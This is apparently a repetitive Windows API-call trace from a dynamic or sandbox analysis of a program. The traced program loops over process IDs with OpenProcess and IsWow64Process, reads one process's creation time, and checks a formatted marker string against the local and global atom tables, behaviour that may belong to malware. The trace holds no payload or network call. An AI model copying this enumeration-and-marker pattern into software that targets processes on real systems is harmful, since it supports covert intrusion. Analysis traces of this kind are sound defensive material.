	[0103.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.340] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.340] CloseHandle (hObject=0x690) returned 1
	[0103.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.341] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.341] CloseHandle (hObject=0x690) returned 1
	[0103.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.341] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.341] CloseHandle (hObject=0x690) returned 1
	[0103.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.341] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.341] CloseHandle (hObject=0x690) returned 1
	[0103.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.341] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.341] CloseHandle (hObject=0x690) returned 1
	[0103.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.342] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.343] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.343] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.344] wsprintfA (in: param_1=0x3993150, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.344] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.344] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.345] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.345] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.345] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.345] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.345] CloseHandle (hObject=0x690) returned 1
	[0103.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.345] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.346] CloseHandle (hObject=0x690) returned 1
	[0103.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.346] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.346] CloseHandle (hObject=0x690) returned 1
	[0103.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.383] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.383] CloseHandle (hObject=0x690) returned 1
	[0103.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.384] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.384] CloseHandle (hObject=0x690) returned 1
	[0103.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.384] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.384] CloseHandle (hObject=0x690) returned 1
	[0103.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.384] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.384] CloseHandle (hObject=0x690) returned 1
	[0103.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.384] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.385] CloseHandle (hObject=0x690) returned 1
	[0103.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.385] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.385] CloseHandle (hObject=0x690) returned 1
	[0103.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.385] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.385] CloseHandle (hObject=0x690) returned 1
	[0103.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.385] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.385] CloseHandle (hObject=0x690) returned 1
	[0103.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.385] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.385] CloseHandle (hObject=0x690) returned 1
	[0103.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.386] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.386] CloseHandle (hObject=0x690) returned 1
	[0103.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.386] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.386] CloseHandle (hObject=0x690) returned 1
	[0103.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.386] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.386] CloseHandle (hObject=0x690) returned 1
	[0103.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.387] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.387] CloseHandle (hObject=0x690) returned 1
	[0103.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.387] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.387] CloseHandle (hObject=0x690) returned 1
	[0103.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.387] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.387] CloseHandle (hObject=0x690) returned 1
	[0103.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.387] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.387] CloseHandle (hObject=0x690) returned 1
	[0103.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.387] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.387] CloseHandle (hObject=0x690) returned 1
	[0103.387] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.387] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.388] CloseHandle (hObject=0x690) returned 1
	[0103.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.388] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.388] CloseHandle (hObject=0x690) returned 1
	[0103.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.388] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.388] CloseHandle (hObject=0x690) returned 1
	[0103.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.388] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.388] CloseHandle (hObject=0x690) returned 1
	[0103.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.388] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.388] CloseHandle (hObject=0x690) returned 1
	[0103.388] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.388] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.389] CloseHandle (hObject=0x690) returned 1
	[0103.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.389] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.389] CloseHandle (hObject=0x690) returned 1
	[0103.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.389] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.389] CloseHandle (hObject=0x690) returned 1
	[0103.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.389] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.389] CloseHandle (hObject=0x690) returned 1
	[0103.389] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.389] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.389] CloseHandle (hObject=0x690) returned 1
	[0103.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.390] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.390] CloseHandle (hObject=0x690) returned 1
	[0103.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.390] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.390] CloseHandle (hObject=0x690) returned 1
	[0103.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.390] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.390] CloseHandle (hObject=0x690) returned 1
	[0103.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.390] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.390] CloseHandle (hObject=0x690) returned 1
	[0103.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.391] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.391] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.391] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.391] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.391] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.391] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.392] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.392] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.392] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.392] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0103.392] CloseHandle (hObject=0x690) returned 1
	[0103.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0103.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0103.392] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.392] CloseHandle (hObject=0x690) returned 1
	[0103.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0103.392] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.392] CloseHandle (hObject=0x690) returned 1
	[0103.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0103.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0103.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0103.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0103.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0103.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0103.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0103.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0103.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0103.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0103.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0103.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0103.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0103.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0103.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0103.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0103.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0103.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0103.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0103.429] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.429] CloseHandle (hObject=0x690) returned 1
	[0103.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0103.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0103.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0103.429] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.429] CloseHandle (hObject=0x690) returned 1
	[0103.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0103.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0103.430] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.430] CloseHandle (hObject=0x690) returned 1
	[0103.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0103.430] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.430] CloseHandle (hObject=0x690) returned 1
	[0103.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0103.430] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.430] CloseHandle (hObject=0x690) returned 1
	[0103.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0103.430] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.430] CloseHandle (hObject=0x690) returned 1
	[0103.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0103.430] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.430] CloseHandle (hObject=0x690) returned 1
	[0103.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0103.431] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.431] CloseHandle (hObject=0x690) returned 1
	[0103.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0103.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0103.431] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.431] CloseHandle (hObject=0x690) returned 1
	[0103.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0103.431] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.431] CloseHandle (hObject=0x690) returned 1
	[0103.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0103.432] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.432] CloseHandle (hObject=0x690) returned 1
	[0103.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0103.432] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.432] CloseHandle (hObject=0x690) returned 1
	[0103.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0103.432] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.432] CloseHandle (hObject=0x690) returned 1
	[0103.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0103.432] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.432] CloseHandle (hObject=0x690) returned 1
	[0103.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0103.432] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.432] CloseHandle (hObject=0x690) returned 1
	[0103.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0103.433] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.433] CloseHandle (hObject=0x690) returned 1
	[0103.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0103.433] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.433] CloseHandle (hObject=0x690) returned 1
	[0103.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0103.433] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.433] CloseHandle (hObject=0x690) returned 1
	[0103.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0103.433] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.433] CloseHandle (hObject=0x690) returned 1
	[0103.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0103.433] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.433] CloseHandle (hObject=0x690) returned 1
	[0103.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0103.433] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.434] CloseHandle (hObject=0x690) returned 1
	[0103.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0103.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.434] CloseHandle (hObject=0x690) returned 1
	[0103.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0103.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.434] CloseHandle (hObject=0x690) returned 1
	[0103.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0103.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.434] CloseHandle (hObject=0x690) returned 1
	[0103.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0103.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.434] CloseHandle (hObject=0x690) returned 1
	[0103.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0103.434] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.435] CloseHandle (hObject=0x690) returned 1
	[0103.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0103.435] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.435] CloseHandle (hObject=0x690) returned 1
	[0103.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0103.435] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.435] CloseHandle (hObject=0x690) returned 1
	[0103.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0103.435] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.435] CloseHandle (hObject=0x690) returned 1
	[0103.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0103.436] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.436] CloseHandle (hObject=0x690) returned 1
	[0103.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.436] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0103.436] CloseHandle (hObject=0x690) returned 1
	[0103.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0103.436] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.437] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0103.437] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0103.437] wsprintfA (in: param_1=0x3993268, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0103.437] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.437] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0103.437] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0103.438] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0103.438] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0103.438] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
